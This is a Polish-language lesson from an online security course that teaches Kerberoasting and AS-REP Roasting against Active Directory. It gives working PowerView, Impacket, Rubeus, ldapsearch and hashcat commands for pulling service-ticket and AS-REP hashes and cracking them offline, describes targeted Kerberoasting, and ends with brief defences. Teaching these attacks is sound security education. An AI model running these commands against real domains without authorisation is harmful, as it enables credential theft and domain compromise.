Kerberoasting i AS-REP Roasting
Zażądają Państwo biletów usług Kerberos i złamią je offline za pomocą Hashcat.
Kerberoasting i AS-REP Roasting to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 3 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.
Szyfrowanie biletów Kerberos
Bilety usług są szyfrowane skrótem hasła konta usługi. Każdy użytkownik domeny może zażądać biletu usługi dla dowolnego SPN. Jeśli konto usługi ma słabe hasło, bilet można łamać offline.
Czym jest Kerberoasting?
Kerberoasting polega na żądaniu biletów usług dla kont z nazwami głównych usług (SPN), wyodrębnieniu zaszyfrowanego biletu i złamaniu go offline za pomocą Hashcat. Nie są wymagane podwyższone uprawnienia — może to zrobić dowolny użytkownik domeny.
# Steps:
# 1. Find accounts with SPNs
# 2. Request their service tickets
# 3. Extract ticket hashes
# 4. Crack with HashcatWyszukiwanie SPN
Wylicz wszystkie konta usług z SPN za pomocą PowerView, Impacket lub natywnych narzędzi AD. SPN-y łączą konta usług z odpowiadającymi im usługami.
# PowerView (Windows)
Get-DomainUser -SPN
Get-NetUser -SPN | select name,serviceprincipalname
# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com
# Native LDAP query
ldapsearch -H ldap://dc -b "DC=corp,DC=com" \
"(servicePrincipalName=*)" cn servicePrincipalNameŻądanie i wyodrębnianie biletów
Rubeus (Windows) i GetUserSPNs z Impacket (Linux) żądają biletów i zapisują je w formacie umożliwiającym łamanie.
# Rubeus (Windows)
Rubeus.exe kerberoast /format:hashcat /output:hashes.txt
# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com \
-request -outputfile hashes.txtŁamanie za pomocą Hashcat
Skróty Kerberoast używają trybu 13100 (Kerberos 5 TGS-REP). Aby uzyskać maksymalną skuteczność, użyj rozbudowanej listy słów wraz z regułami.
# Crack TGS-REP hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
# With rules for better coverage
hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule
# AES tickets: mode 19700 (AES128) or 19800 (AES256)Czym jest AS-REP Roasting?
AS-REP Roasting atakuje konta z włączoną opcją Nie wymagaj wstępnego uwierzytelniania Kerberos. AS zwraca TGT zaszyfrowany skrótem użytkownika — można zażądać go bez znajomości hasła, a następnie łamać offline.
Wyszukiwanie kont z wyłączonym wstępnym uwierzytelnianiem
Konta bez wstępnego uwierzytelniania są wynikiem błędnej konfiguracji, często pozostawionej przez starsze aplikacje. Wylicz je za pomocą PowerView lub GetNPUsers.
# PowerView
Get-DomainUser -PreauthNotRequired
# Impacket GetNPUsers (no password needed!)
GetNPUsers.py CORP/ -usersfile users.txt \
-dc-ip dc.corp.com -format hashcat -outputfile asrep.txt
# Rubeus
Rubeus.exe asreproast /format:hashcat /output:asrep.txtŁamanie skrótów AS-REP
Skróty AS-REP używają trybu 18200 programu Hashcat. Proces łamania jest taki sam jak w przypadku Kerberoasting — to offline’owy atak słownikowy na zaszyfrowaną odpowiedź AS.
# Crack AS-REP hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
# With rules:
hashcat -m 18200 asrep.txt rockyou.txt -r best64.ruleOcena skutków
Złamane hasła kont usług często zapewniają podwyższone uprawnienia — konta usług uruchamiające bazy danych, oprogramowanie do tworzenia kopii zapasowych lub Exchange mogą być administratorami domeny. Konta podatne na AS-REP Roasting są często pomijane i słabo zabezpieczone.
Ukierunkowany Kerberoasting
Jeśli masz dostęp do zapisu obiektu, możesz tymczasowo dodać SPN do konta o wysokiej wartości, przeprowadzić na nim kerberoasting, złamać skrót, a następnie usunąć SPN — umożliwia to atakowanie konkretnych kont na żądanie.
Mechanizmy obrony
Obrona przed Kerberoastingiem: używaj długich, losowych haseł (co najmniej 25 znaków) dla kont usług albo, jeszcze lepiej, korzystaj z Group Managed Service Accounts (gMSA) z automatycznie zmienianymi hasłami o długości 120 znaków. W przypadku AS-REP Roasting włącz wstępne uwierzytelnianie na wszystkich kontach.
Szybkie sprawdzenie
Jaki atrybut konta jest wymagany, aby AS-REP Roasting był możliwy?
Podsumowanie: Kerberoasting i AS-REP Roasting
Oba ataki wykorzystują słabości szyfrowania biletów Kerberos, aby łamać hasła offline bez wywoływania blokady kont. Kerberoasting atakuje konta z SPN (może go przeprowadzić dowolny użytkownik domeny), a AS-REP Roasting atakuje konta bez wstępnego uwierzytelniania (poświadczenia nie są potrzebne). Stosuj gMSA dla kont usług i wymuś wstępne uwierzytelnianie dla wszystkich użytkowników.
Często zadawane pytania
Czy lekcja „Kerberoasting i AS-REP Roasting” jest bezpłatna?
Tak — pełny tekst „Kerberoasting i AS-REP Roasting” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.
Co nauczysz się w „Kerberoasting i AS-REP Roasting”?
Zażądają Państwo biletów usług Kerberos i złamią je offline za pomocą Hashcat. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.
Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?
Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 3 z 4.
Ile czasu zajmuje lekcja „Kerberoasting i AS-REP Roasting”?
Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.
Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?
Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.
Wszystkie lekcje w tym kursie
- Uwierzytelnianie Windows: NTLM i Kerberos
- Ataki Pass-the-Hash i Pass-the-Ticket
- Kerberoasting i AS-REP Roasting
- Hartowanie Active Directory